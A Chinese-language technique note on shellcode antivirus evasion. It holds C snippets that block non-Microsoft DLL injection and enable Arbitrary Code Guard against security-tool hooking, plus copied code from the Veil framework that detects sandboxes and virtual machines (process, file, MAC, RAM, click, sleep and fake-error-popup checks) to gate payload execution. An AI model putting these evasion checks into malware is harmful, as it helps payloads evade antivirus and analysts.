shellcode 免杀技术整理
参考
- [x] https://github.com/Airboi/bypass-av-note
- 内存加载dll
- https://github.com/fancycode/MemoryModule
- 阻止dll
- 阻止非微软签名dll注入
- https://www.anquanke.com/post/id/190344
- 限制条件: win8/win2012以上
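STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size = 0;
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
// First call only reports the buffer size needed for one attribute; it is
// expected to "fail" with ERROR_INSUFFICIENT_BUFFER, so its result is ignored.
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
// Allocate memory for the PROC_THREAD_ATTRIBUTE_LIST (must be checked: a NULL
// list would be dereferenced by the initialise call below).
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
if (si.lpAttributeList == NULL) {
    return 1;
}
// Initialise the list for real this time.
if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return 1;
}
// Child-process mitigation: only Microsoft-signed images may be loaded into
// the child. Requires Windows 8 / Server 2012 or later (see note above).
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
// Attach the policy to attribute slot 0; on failure release the list so the
// caller does not leak it.
if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL)) {
    DeleteProcThreadAttributeList(si.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return 1;
}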
- ACG(Arbitrary Code Guard)
- 阻止杀软在hook我们的进程后,在进程内部使用VirtualAlloc等函数修改内存空间,使其无法生成动态代码或修改现有的可执行代码。

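// Arbitrary Code Guard (ACG) for the current process: once enabled, the
// process can no longer create new executable memory or make existing
// executable pages writable.
PROCESS_MITIGATION_DYNAMIC_CODE_POLICY acg_policy = {0};
acg_policy.ProhibitDynamicCode = 1;
// SetProcessMitigationPolicy returns BOOL; test it directly instead of
// comparing against C's bool `false` (which needs <stdbool.h>).
if (!SetProcessMitigationPolicy(ProcessDynamicCodePolicy, &acg_policy, sizeof(acg_policy))) {
    // Message names the call that actually failed.
    MessageBoxA(NULL, "SetProcessMitigationPolicy(ProcessDynamicCodePolicy) failed.", "error", MB_OK);
    return 1;
}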
- [x] VEIL-FRAMEWORK 研究
- https://www.veil-framework.com/
- https://github.com/Veil-Framework/Veil
版本变更历史
- 3.1 将内存权限从 rwx 改为 rw,再使用 VirtualProtect 改为 rx
- 3.0 加入
Ordnance,使用自己的生成器 https://github.com/Veil-Framework/Veil-Ordnance ; `-t Evasion` 列出所有可用的逃逸选项
veil 检测技术整理
tools\evasion\evasion_common\gamemaker.py
虚拟dll检测
check_code += '\t' * num_tabs_required + 'import win32api\n'
check_code += '\t' * num_tabs_required + 'import win32process\n'
check_code += '\t' * num_tabs_required + evidenceof_sandbox + '= []\n'
# removed dbghelp.dll
check_code += '\t' * num_tabs_required + sandbox_dlls + ' = ["sbiedll.dll","api_log.dll","dir_watch.dll","pstorec.dll","vmcheck.dll","wpespy.dll"]\n'
check_code += '\t' * num_tabs_required + all_pids + '= win32process.EnumProcesses()\n'
check_code += '\t' * num_tabs_required + 'for ' + pid + ' in ' + all_pids + ':\n'
check_code += '\t' * num_tabs_required + '\ttry:\n'
check_code += '\t' * num_tabs_required + '\t\t' + hProcess + ' = win32api.OpenProcess(0x0410, 0, ' + pid + ')\n'
check_code += '\t' * num_tabs_required + '\t\ttry:\n'
check_code += '\t' * num_tabs_required + '\t\t\t' + curProcessDLLs + '= win32process.EnumProcessModules(' + hProcess + ')\n'
check_code += '\t' * num_tabs_required + '\t\t\tfor ' + dll + ' in ' + curProcessDLLs + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t' + dll_name + '= str(win32process.GetModuleFileNameEx(' + hProcess + ', ' + dll + ')).lower()\n'
check_code += '\t' * num_tabs_required + '\t\t\t\tfor ' + sandbox_dll + ' in '+ sandbox_dlls + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\tif ' + sandbox_dll + ' in ' + dll_name + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\t\tif ' + dll_name + ' not in ' + evidenceof_sandbox + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\t\t\t' + evidenceof_sandbox + '.append(' + dll_name + ')\n'
check_code += '\t' * num_tabs_required + '\t\tfinally:\n'
check_code += '\t' * num_tabs_required + '\t\t\twin32api.CloseHandle(' + pid + ')\n'
check_code += '\t' * num_tabs_required + '\texcept:\n'
check_code += '\t' * num_tabs_required + '\t\tpass\n'
check_code += '\t' * num_tabs_required + 'if not ' + evidenceof_sandbox + ':\n'
最小内存
check_code += '\t' * num_tabs_required + 'import ctypes\n'
check_code += '\t' * num_tabs_required + 'class ' + class_name + ' (ctypes.Structure):\n'
check_code += '\t' * num_tabs_required + '\t_fields_ = [\n'
check_code += '\t' * num_tabs_required + '\t\t("dwLength", ctypes.c_ulong),\n'
check_code += '\t' * num_tabs_required + '\t\t("dwMemoryLoad", ctypes.c_ulong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalPhys", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailPhys", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalPageFile", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailPageFile", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("sullAvailExtendedVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t]\n'
check_code += '\t' * num_tabs_required + memory_status + ' = ' + class_name + '()\n'
check_code += '\t' * num_tabs_required + memory_status + '.dwLength = ctypes.sizeof(' + class_name + ')\n'
check_code += '\t' * num_tabs_required + 'ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(' + memory_status + '))\n'
check_code += '\t' * num_tabs_required + 'if ' + memory_status + '.ullTotalPhys/1073741824 > 3:\n'
鼠标点击轨迹
check_code += '\t' * num_tabs_required + 'import win32api\n'
check_code += '\t' * num_tabs_required + rand_counter + " = 0\n"
check_code += '\t' * num_tabs_required + minimum_clicks + " = " + evasion_payload.required_options["CLICKTRACK"][0] + "\n"
check_code += '\t' * num_tabs_required + 'while ' + rand_counter + ' < ' + minimum_clicks + ':\n'
check_code += '\t' * num_tabs_required + '\t' + left_click + ' = win32api.GetAsyncKeyState(1)\n'
check_code += '\t' * num_tabs_required + '\t' + right_click + ' = win32api.GetAsyncKeyState(2)\n'
check_code += '\t' * num_tabs_required + '\t' + 'if ' + left_click + ' % 2 == 1:\n'
check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'
check_code += '\t' * num_tabs_required + '\t' + 'if ' + right_click + ' % 2 == 1:\n'
check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'
check_code += '\t' * num_tabs_required + 'if ' + rand_counter + ' >= ' + minimum_clicks + ':\n'
虚拟文件检查
check_code += '\t' * num_tabs_required + 'import os\n'
check_code += '\t' * num_tabs_required + vmfiles_exist + ' = []\n'
check_code += '\t' * num_tabs_required + files_tocheck + " = [r'C:\windows\Sysnative\Drivers\Vmmouse.sys', r'C:\windows\Sysnative\Drivers\vm3dgl.dll', r'C:\windows\Sysnative\Drivers\vmdum.dll', r'C:\windows\Sysnative\Drivers\vm3dver.dll', r'C:\windows\Sysnative\Drivers\vmtray.dll', r'C:\windows\Sysnative\Drivers\vmci.sys', r'C:\windows\Sysnative\Drivers\vmusbmouse.sys', r'C:\windows\Sysnative\Drivers\vmx_svga.sys', r'C:\windows\Sysnative\Drivers\vmxnet.sys', r'C:\windows\Sysnative\Drivers\VMToolsHook.dll', r'C:\windows\Sysnative\Drivers\vmhgfs.dll', r'C:\windows\Sysnative\Drivers\vmmousever.dll', r'C:\windows\Sysnative\Drivers\vmGuestLib.dll', r'C:\windows\Sysnative\Drivers\VmGuestLibJava.dll', r'C:\windows\Sysnative\Drivers\vmscsi.sys', r'C:\windows\Sysnative\Drivers\VBoxMouse.sys', r'C:\windows\Sysnative\Drivers\VBoxGuest.sys', r'C:\windows\Sysnative\Drivers\VBoxSF.sys', r'C:\windows\Sysnative\Drivers\VBoxVideo.sys', r'C:\windows\Sysnative\vboxdisp.dll', r'C:\windows\Sysnative\vboxhook.dll', r'C:\windows\Sysnative\vboxmrxnp.dll', r'C:\windows\Sysnative\vboxogl.dll', r'C:\windows\Sysnative\vboxoglarrayspu.dll', r'C:\windows\Sysnative\vboxoglcrutil.dll', r'C:\windows\Sysnative\vboxoglerrorspu.dll', r'C:\windows\Sysnative\vboxoglfeedbackspu.dll', r'C:\windows\Sysnative\vboxoglpackspu.dll', r'C:\windows\Sysnative\vboxoglpassthroughspu.dll', r'C:\windows\Sysnative\vboxservice.exe', r'C:\windows\Sysnative\vboxtray.exe', r'C:\windows\Sysnative\VBoxControl.exe']"
check_code += '\t' * num_tabs_required + 'for ' + file_path + ' in ' + files_tocheck + ':\n'
check_code += '\t' * num_tabs_required + '\tif os.path.isfile(' + file_path + '):\n'
check_code += '\t' * num_tabs_required + '\t\t' + vmfiles_exist + '.append(' + file_path + ')'
check_code += '\t' * num_tabs_required + 'if not ' + vmfiles_exist + ':\n'
用户提示
check_code += '\t' * num_tabs_required + 'import ctypes\n'
check_code += '\t' * num_tabs_required + popup_title + ' = "System Error 0x18463832"\n'
check_code += '\t' * num_tabs_required + popup_message + ' = "Your system encountered an error, please click OK to proceed"\n'
check_code += '\t' * num_tabs_required + message_box + ' = ctypes.windll.user32.MessageBoxW\n'
check_code += '\t' * num_tabs_required + message_box + '(None, ' + popup_message + ', ' + popup_title + ', 0)\n'
check_code += '\t' * num_tabs_required + 'if True:\n'
沙盒处理
check_code += '\t' * num_tabs_required + 'import win32pdh\n'
check_code += '\t' * num_tabs_required + sandbox_exist + ' = []\n'
check_code += '\t' * num_tabs_required + bad_procs + ' = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'
check_code += '\t' * num_tabs_required + '_, ' + current_processes + ' = win32pdh.EnumObjectItems(None,None,\'process\', win32pdh.PERF_DETAIL_WIZARD)\n'
check_code += '\t' * num_tabs_required + 'for ' + process + ' in ' + current_processes + ':\n'
check_code += '\t' * num_tabs_required + '\tfor ' + sandbox_proc + ' in ' + bad_procs + ':\n'
check_code += '\t' * num_tabs_required + '\t\tif ' + sandbox_proc + ' in str(' + process + '.lower()):\n'
check_code += '\t' * num_tabs_required + '\t\t\t' + sandbox_exist + '.append(' + process + ')\n'
check_code += '\t' * num_tabs_required + '\t\t\tbreak\n'
check_code += '\t' * num_tabs_required + 'if not ' + sandbox_exist + ':\n'
SLEEP
check_code += '\t' * num_tabs_required + 'from time import sleep\n'
check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n'
check_code += '\t' * num_tabs_required + 'import sys\n'
check_code += '\t' * num_tabs_required + 'import datetime\n'
check_code += '\t' * num_tabs_required + 'import time\n'
check_code += '\t' * num_tabs_required + 'import socket\n'
check_code += '\t' * num_tabs_required + 'import struct\n'
check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, SOCK_DGRAM)\n'
check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'
check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'
check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n'
check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'
check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'
check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'
check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n'
Go语言对应处理代码
rand_username = evasion_helpers.randomString()
rand_error1 = evasion_helpers.randomString()
rand_hostname = evasion_helpers.randomString()
rand_error2 = evasion_helpers.randomString()
rand_processor = evasion_helpers.randomString()
rand_domain = evasion_helpers.randomString()
if evasion_payload.required_options["USERNAME"][0].lower() != "x":
check_code += rand_username + ", " + rand_error1 + " := user.Current()\n"
check_code += "if " + rand_error1 + " != nil {\n"
check_code += "os.Exit(1)}\n"
check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n"
num_tabs_required += 1
if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":
check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n"
check_code += "if " + rand_error2 + " != nil {\n"
check_code += "os.Exit(1)}\n"
check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n"
num_tabs_required += 1
if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":
check_code += rand_processor + " := runtime.NumCPU()\n"
check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n"
num_tabs_required += 1
if evasion_payload.required_options["SLEEP"][0].lower() != "x":
check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n'
check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n'
check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n'
check_code += 'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n'
check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n'
check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n'
check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n'
check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n'
check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n'
check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {'
num_tabs_required += 1
if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":
tzone_abbrev = evasion_helpers.randomString()
tzone_offset = evasion_helpers.randomString()
check_code += '_, ' + tzone_offset + ' := time.Now().Zone()\n'
check_code += 'if ' + tzone_offset + ' != 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":
title_box = evasion_helpers.randomString()
message_box = evasion_helpers.randomString()
user32_dll = evasion_helpers.randomString()
messagebox_w = evasion_helpers.randomString()
check_code += 'var ' + title_box + ' = "System Error Encountered"\n'
check_code += 'var ' + message_box + ' = "System error 0x831d83a4 - Press OK to continue"\n'
check_code += 'var ' + user32_dll + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + messagebox_w + ' = ' + user32_dll + '.NewProc("MessageBoxW")\n'
check_code += messagebox_w + '.Call(0,\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + message_box + '))),\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + title_box + '))),\n'
check_code += '0)\n'
check_code += 'if true {\n'
num_tabs_required += 1
if evasion_payload.required_options["RAMCHECK"][0].lower() != 'false':
memstatusx = evasion_helpers.randomString()
kernel32_dll = evasion_helpers.randomString()
globalmem_status = evasion_helpers.randomString()
mem_info = evasion_helpers.randomString()
check_code += 'type ' + memstatusx + ' struct {\n'
check_code += '\tdwLength\tuint32\n'
check_code += '\tdwMemoryLoad\tuint32\n'
check_code += '\tullTotalPhys\tuint64\n'
check_code += '\tullAvailPhys\tuint64\n'
check_code += '\tullTotalPageFile\tuint64\n'
check_code += '\tullAvailPageFile\tuint64\n'
check_code += '\tullTotalVirtual\tuint64\n'
check_code += '\tullAvailVirtual\tuint64\n'
check_code += '\tullAvailExtendedVirtual\tuint64\n'
check_code += '}\n'
check_code += 'var ' + kernel32_dll + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + globalmem_status + ' = ' + kernel32_dll + '.NewProc("GlobalMemoryStatusEx")\n'
check_code += 'var ' + mem_info + ' ' + memstatusx + '\n'
check_code += mem_info + '.dwLength = uint32(unsafe.Sizeof(' + mem_info + '))\n'
check_code += globalmem_status + '.Call(uintptr(unsafe.Pointer(&' + mem_info + ')))\n'
check_code += 'if (' + mem_info + '.ullTotalPhys/1073741824 >= 3) {\n'
num_tabs_required += 1
if evasion_payload.required_options["PROCCHECK"][0].lower() != 'false':
kernel32 = evasion_helpers.randomString()
createtoolhelp = evasion_helpers.randomString()
proc32first = evasion_helpers.randomString()
proc32next = evasion_helpers.randomString()
closehandle = evasion_helpers.randomString()
procentry32 = evasion_helpers.randomString()
ev_of_sandbox = evasion_helpers.randomString()
sbox_procs = evasion_helpers.randomString()
hproc_snap = evasion_helpers.randomString()
exe_names = evasion_helpers.randomString()
pe32 = evasion_helpers.randomString()
ret_val = evasion_helpers.randomString()
exe = evasion_helpers.randomString()
sbox_process = evasion_helpers.randomString()
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'
check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'
check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'
check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'
check_code += 'type ' + procentry32 + ' struct {\n'
check_code += '\tdwSize\t\tuint32\n'
check_code += '\tcntUsage\t\tuint32\n'
check_code += '\tth32ProcessID\t\tuint32\n'
check_code += '\tth32DefaultHeapID\t\tuintptr\n'
check_code += '\tth32ModuleID\t\tuint32\n'
check_code += '\tcntThreads\t\tuint32\n'
check_code += '\tth32ParentProcessID\t\tuint32\n'
check_code += '\tpcPriClassBase\t\tint32\n'
check_code += '\tdwFlags\t\tuint32\n'
check_code += '\tszExeFile\t\t[260]uint16\n'
check_code += '}\n'
check_code += ev_of_sandbox + ' := make([]string, 0)\n'
check_code += sbox_procs + " := [...]string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`, `vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`, `vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`, `vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}\n"
check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'
check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'
check_code += exe_names + ' := make([]string, 0, 100)\n'
check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'
check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'
check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += 'for {\n'
check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'
check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += '\tif ' + ret_val + ' == 0 {\n'
check_code += '\t\tbreak\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'
check_code += '\tfor _, ' + sbox_process + ' := range ' + sbox_procs + ' {\n'
check_code += '\t\tif (strings.Contains(strings.ToLower(' + exe + '), strings.ToLower(' + sbox_process + '))) {\n'
check_code += '\t\t\t' + ev_of_sandbox + ' = append(' + ev_of_sandbox + ', ' + exe + ')\n'
check_code += '\t\t}\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if len(' + ev_of_sandbox + ') == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["MINPROCS"][0].lower() != 'x':
kernel32 = evasion_helpers.randomString()
createtoolhelp = evasion_helpers.randomString()
proc32first = evasion_helpers.randomString()
proc32next = evasion_helpers.randomString()
closehandle = evasion_helpers.randomString()
min_processes = evasion_helpers.randomString()
procentry32 = evasion_helpers.randomString()
hproc_snap = evasion_helpers.randomString()
exe_names = evasion_helpers.randomString()
pe32 = evasion_helpers.randomString()
ret_val = evasion_helpers.randomString()
exe = evasion_helpers.randomString()
count_running_procs = evasion_helpers.randomString()
wut = evasion_helpers.randomString()
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'
check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'
check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'
check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'
check_code += 'type ' + procentry32 + ' struct {\n'
check_code += '\tdwSize\t\tuint32\n'
check_code += '\tcntUsage\t\tuint32\n'
check_code += '\tth32ProcessID\t\tuint32\n'
check_code += '\tth32DefaultHeapID\t\tuintptr\n'
check_code += '\tth32ModuleID\t\tuint32\n'
check_code += '\tcntThreads\t\tuint32\n'
check_code += '\tth32ParentProcessID\t\tuint32\n'
check_code += '\tpcPriClassBase\t\tint32\n'
check_code += '\tdwFlags\t\tuint32\n'
check_code += '\tszExeFile\t\t[260]uint16\n'
check_code += '}\n'
check_code += min_processes + ' := ' + evasion_payload.required_options["MINPROCS"][0] + '\n'
check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'
check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'
check_code += exe_names + ' := make([]string, 0, 100)\n'
check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'
check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'
check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += 'for {\n'
check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'
check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += '\tif ' + ret_val + ' == 0 {\n'
check_code += '\t\tbreak\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += count_running_procs + ' := 0\n'
check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'
check_code += "\tif " + exe + " == \"\" {\n"
check_code += "\t\tos.Exit(1)}\n"
check_code += '\t' + count_running_procs + ' += 1\n'
check_code += '}\n'
check_code += 'if (' + count_running_procs + ' >= ' + min_processes + ') {\n'
num_tabs_required += 1
if evasion_payload.required_options["BADMACS"][0].lower() != 'false':
evd_sandbox = evasion_helpers.randomString()
bad_addrs = evasion_helpers.randomString()
nics = evasion_helpers.randomString()
single_nic = evasion_helpers.randomString()
bad_mac = evasion_helpers.randomString()
check_code += evd_sandbox + ' := make([]net.HardwareAddr, 0)\n'
check_code += bad_addrs + ' := [...]string{`00:0C:29`, `00:1C:14`, `00:50:56`, `00:05:69`, `08:00:27`}\n'
check_code += nics + ', _ := net.Interfaces()\n'
check_code += 'for _, ' + single_nic + ' := range ' + nics + ' {\n'
check_code += '\tfor _, ' + bad_mac + ' := range ' + bad_addrs + ' {\n'
check_code += '\t\tif strings.Contains(strings.ToLower(' + single_nic + '.HardwareAddr.String()), strings.ToLower(' + bad_mac + ')) {\n'
check_code += '\t\t\t' + evd_sandbox + ' = append(' + evd_sandbox + ', ' + single_nic + '.HardwareAddr)\n'
check_code += '\t\t}\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if len(' + evd_sandbox + ') == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["CLICKTRACK"][0].lower() != 'x':
usr32 = evasion_helpers.randomString()
getkey_state = evasion_helpers.randomString()
counter = evasion_helpers.randomString()
min_clicks = evasion_helpers.randomString()
lft_click = evasion_helpers.randomString()
rght_click = evasion_helpers.randomString()
check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + getkey_state + ' = ' + usr32 + '.NewProc("GetAsyncKeyState")\n'
check_code += 'var ' + counter + ' = 0\n'
check_code += 'var ' + min_clicks + ' = ' + evasion_payload.required_options["CLICKTRACK"][0] + '\n'
check_code += 'for ' + counter + ' < ' + min_clicks + ' {\n'
check_code += '\t' + lft_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x1))\n'
check_code += '\t' + rght_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x2))\n'
check_code += '\tif ' + lft_click + ' % 2 == 1 {\n'
check_code += '\t\t' + counter + ' += 1\n'
check_code += '\t}\n'
check_code += '\tif ' + rght_click + ' % 2 == 1 {\n'
check_code += '\t\t' + counter + ' += 1\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if true {\n'
num_tabs_required += 1
if evasion_payload.required_options["CURSORCHECK"][0].lower() != 'false':
usr32 = evasion_helpers.randomString()
cursor_position = evasion_helpers.randomString()
point_struct = evasion_helpers.randomString()
secs = evasion_helpers.randomString()
point_var1 = evasion_helpers.randomString()
point_var2 = evasion_helpers.randomString()
check_code += 'type ' + point_struct + ' struct {\n'
check_code += '\tx, y int32\n'
check_code += '}\n'
check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + cursor_position + ' = ' + usr32 + '.NewProc("GetCursorPos")\n'
check_code += secs + ' := 60\n'
check_code += point_var1 + ' := ' + point_struct + '{}\n'
check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var1 + ')))\n'
check_code += 'time.Sleep(time.Duration(' + secs + ' * 1000) * time.Millisecond)\n'
check_code += point_var2 + ' := ' + point_struct + '{}\n'
check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var2 + ')))\n'
check_code += 'if ' + point_var1 + '.x - ' + point_var2 + '.x == 0 && ' + point_var1 + '.y - ' + point_var2 + '.y == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["DISKSIZE"][0].lower() != 'x':
min_disk_size = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
getDiskFreeSpaceEx = evasion_helpers.randomString()
lpFreeBytesAvailable = evasion_helpers.randomString()
lpTotalNumberOfBytes = evasion_helpers.randomString()
lpTotalNumberOfFreeBytes = evasion_helpers.randomString()
cur_disk_size = evasion_helpers.randomString()
check_code += min_disk_size + ' := float32(' + evasion_payload.required_options["DISKSIZE"][0] + ')\n'
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + getDiskFreeSpaceEx + ' = ' + kernel32 + '.NewProc("GetDiskFreeSpaceExW")\n'
check_code += lpFreeBytesAvailable + ' := int64(0)\n'
check_code += '\t' + lpTotalNumberOfBytes + ' := int64(0)\n'
check_code += '\t' + lpTotalNumberOfFreeBytes + ' := int64(0)\n'
check_code += getDiskFreeSpaceEx + '.Call(\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpFreeBytesAvailable + ')),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfBytes + ')),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfFreeBytes + ')))\n'
check_code += cur_disk_size + ' := float32(' + lpTotalNumberOfBytes + ')/1073741824\n'
check_code += 'if (' + cur_disk_size + ' > ' + min_disk_size + ') {\n'
num_tabs_required += 1
# Return check information
return check_code, num_tabs_required
Veil 各平台编译代码
- ruby
os.system('WINEPREFIX=' + settings.WINEPREFIX + ' wine ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ruby.exe ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ocra --windows '+ source_code_filepath + ' --output ' + executable_filepath + ' ' + settings.WINEPREFIX + '/drive_c/Ruby187/lib/ruby/gems/1.8/gems/win32-api-1.4.8-x86-mingw32/lib/win32/*')
- go
